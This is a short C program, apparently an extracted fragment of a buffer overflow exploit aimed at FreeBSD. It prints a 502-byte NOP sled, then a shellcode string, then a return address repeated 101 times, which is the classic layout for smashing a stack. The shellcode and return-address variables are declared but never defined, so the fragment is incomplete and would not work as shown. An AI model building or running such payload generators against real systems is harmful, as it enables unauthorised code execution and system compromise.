
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char* FreeBSD ;
 int printf (char*,...) ;
 char* ret ;

main ()
{
  int i;
  for (i=0;i<=501;i++)
    printf("\x90");
  printf("%s",FreeBSD);
  for (i=0;i<=100;i++)
    printf("%s",ret);
  printf("\n\n");
}
